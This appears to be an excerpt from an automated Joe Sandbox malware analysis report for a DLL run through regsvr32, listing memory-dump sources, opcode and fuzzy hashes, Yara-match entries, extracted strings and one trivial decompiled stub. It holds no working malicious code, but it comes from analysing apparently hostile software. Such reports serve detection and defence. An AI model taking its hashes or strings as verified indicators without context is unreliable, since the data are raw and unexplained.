                                                                                                                                                                                                            • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                                                                                                                            • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                                                                                                                                            • API String ID: 0-182303197
                                                                                                                                                                                                            • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                                                                                                                            • Instruction ID: 78b9fb27f848f13fb930c9d7ae2bd24b734705d48061cf78a101b734d55189b4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38120570A04709EFDB58DF68C18A99EBBF1FF54308F408169E84AEB250D775DA18CB85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                                                                                                                                            • API String ID: 0-557373213
                                                                                                                                                                                                            • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                                                                                                                            • Instruction ID: 774f7a3e809a02a0a9d31ede4b7925d2d2eefd8e192c744b0b5f588dc5937873
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6E1F17550160CCBDFA8DF38C0994D93BE1FF58308F611229FC6AA62A2DB78D914CB49
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .I$gBfh$i[$w|${
                                                                                                                                                                                                            • API String ID: 0-448909954
                                                                                                                                                                                                            • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                                                                                                                            • Instruction ID: cb9f693eb8adcecd4fff79a655c7eb1389aa09b92b8087821c89981d08e221dd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12B114709247499FCF88DFA9D8898DEBBF1FB48304F40921DE816AB250C778A945CF95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: cp$vm$x$zu$Kn#
                                                                                                                                                                                                            • API String ID: 0-3521309225
                                                                                                                                                                                                            • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                                                                                                                            • Instruction ID: 1103de851daa5bf588f5b036f41e27703aec58d3df15b71a58fc3c5e4b9d88f5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06A113B4D143198FDB88CFA9D8898DEBBF0FB58318F108219E855B7290D3789945CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                                                                                                                                            • API String ID: 0-817034907
                                                                                                                                                                                                            • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                                                                                                                            • Instruction ID: 2ada94d970c2c077678af7e0e886a3d44f33b8476a1d0e2acaa6de63e97e50e4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D41B2B180034E8FDB44CF64C88A4CE7FF0FB68398F215619E85AA6250D3B89694CFD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ,$3T$D-$Rc$l
                                                                                                                                                                                                            • API String ID: 0-617906138
                                                                                                                                                                                                            • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                                                                                                                            • Instruction ID: 0225f655fd0b8d0d7990cdafe17fc8ac98479d33916384cd9a6bd55fa22bc2d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C41D5B081078E8FDF44CF68D88A4CE7BF0FB58358F104619EC69A6260D3B89664CF95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                            			E00000001180001D98(long long __rbx, long long _a32) {
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_a32 = __rbx;
                                                                                                                                                                                                            			}



                                                                                                                                                                                                            0x180001d98

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                            • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                                                                                                                            • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #X$ $UCV$y4.)
                                                                                                                                                                                                            • API String ID: 0-917551206
                                                                                                                                                                                                            • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                                                                                                                            • Instruction ID: 8bea0df8071a4d5f516c1b3d17436cce75e639e174e7541bd436e9df47c343fa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3512E4B5A0470C9FDB58DFA8D08A5DDBBF2FB48348F00412AEA06E7290D7B5D909CB55
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #X$rq%$tL>$".
                                                                                                                                                                                                            • API String ID: 0-3922733902
                                                                                                                                                                                                            • Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                                                                                                                            • Instruction ID: 26bf2311638a9ba48a60747d11c00a1b59bd847b2d0116809fd1a31400d1bd48
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B822C1759096C88BDBF8DF24C8896CD37F0FF48348F90125AD84E9A654DBB86684CF42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: g$-$HE$Vc
                                                                                                                                                                                                            • API String ID: 0-2562162751
                                                                                                                                                                                                            • Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                                                                                                                            • Instruction ID: fe15dbea848e6f24af7959287d533c22477cb444563e9f49f56ad028ab93cb91
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CA1D0B550478C9FDB88CF28D8894CD3BB2FB583A8F505219F84A97260D7B8D985CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (;$*i$he$*%
                                                                                                                                                                                                            • API String ID: 0-35414758
                                                                                                                                                                                                            • Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                                                                                                                            • Instruction ID: b76c6960b3c686b241f8a5211dcf1bcc366d5ccee68d4d9f23844109941970c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE7114745147489BDF48CF28C88A5DD3BA1FB4836CF565329FC4AAA2A0D778D484CB89
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: */$I$Yu$(
                                                                                                                                                                                                            • API String ID: 0-674225443
                                                                                                                                                                                                            • Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                                                                                                                            • Instruction ID: d481ce2d2ed7dd6ec23e75118e520065c2b3bfef67f497e4b24e0981e6aa7399
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA719DB580030ACFDB58CF68D48A5DE7FB0FB68398F204219E85596260D7B49AA5CFC4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #X$.:$PYq|$W
                                                                                                                                                                                                            • API String ID: 0-626586655
                                                                                                                                                                                                            • Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                                                                                                                            • Instruction ID: 472b011e6758fc7fdb175c0716b7d764b40ed85a82f8b0c2e3c8ab1e9e2bb40a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD41037061CB848FD7A8DF28C58A65BBBF1FBD9704F804A1EE589C7290DB759804CB42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: -+$0u$S$e!
                                                                                                                                                                                                            • API String ID: 0-4217091389
                                                                                                                                                                                                            • Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                                                                                                                            • Instruction ID: d3ba53c82a7be11fe7ceef7c0e5ef2455852afa75db9a09d8cb96bbb16d2bbcb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A241E4B090474A8FDB48DF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 5`$<ml$a:$P
                                                                                                                                                                                                            • API String ID: 0-330785107
                                                                                                                                                                                                            • Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                                                                                                                            • Instruction ID: bbdfbc93da4a963afbf07faa29596f78ff58d5f4ab87364be2f2f7e8703aed9a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF41F5B190074E8BDB48DF68C48A49E7FB1FB58348F10861DE85A9A390D7B89664CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: o$"B$SJ$wU
                                                                                                                                                                                                            • API String ID: 0-691100934
                                                                                                                                                                                                            • Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                                                                                                                            • Instruction ID: 3e72372266127c3631aa547ec3f641235b61b79cbd2cd35ffc0f13ebd12ae61f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E641D1B180078E8FDB48CF68C88A5DE7BF0FB58358F104619E859A6254D3B89695CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 9luJ$=2y}$=2y}$b
                                                                                                                                                                                                            • API String ID: 0-1667874806
                                                                                                                                                                                                            • Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                                                                                                                            • Instruction ID: 2ea3090c0c259e62cb90672fe4cf4734fe067202274d6dc404e8614e50ac557a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC41D7B181039EDFDF44CF64D88A4CE7BB0FB18358F110A19E869A6264D3B89665CF85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ;$O,$fdu
                                                                                                                                                                                                            • API String ID: 0-1721916326
                                                                                                                                                                                                            • Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                                                                                                                            • Instruction ID: 7cf207294ab5403af1af446b1ee8018861380f64983cbc85fcbb8ea76ab4ff49
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2A11274D14718EBDF58DFA8E8C999DBBB1FB54318F00421AE81AE72A0CBB49945CF41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: u$&v$f
                                                                                                                                                                                                            • API String ID: 0-1868853588
                                                                                                                                                                                                            • Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                                                                                                                            • Instruction ID: 3afa8740f3abf7df59baccbd8ec596445d42f2880559dd1d3f00cb5feccad3da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD713275D04708ABCF1CDFA8E5895ADBBB1FB48318F10812DE416E72A0CB749945CF81
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: o$j$t
                                                                                                                                                                                                            • API String ID: 0-2067604139
                                                                                                                                                                                                            • Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                                                                                                                            • Instruction ID: c0625a8cdc1230a5c3f885e68dfa253b074a2892d9fee5df06bf4c67b1a2c889
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE61E0756087848BD368DF28C19A55FBBF1FBC6704F104A1DE68A8B2A0D77AD944CB43
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%






                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LinkObjectOpenSymbolic
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: D?"$8zfK
                                                                                                                                                                                                            • API String ID: 0-617590365
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #X$h}
                                                                                                                                                                                                            • API String ID: 0-3021649463
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #X$+ <
                                                                                                                                                                                                            • API String ID: 0-1007305072
                                                                                                                                                                                                            Uniqueness

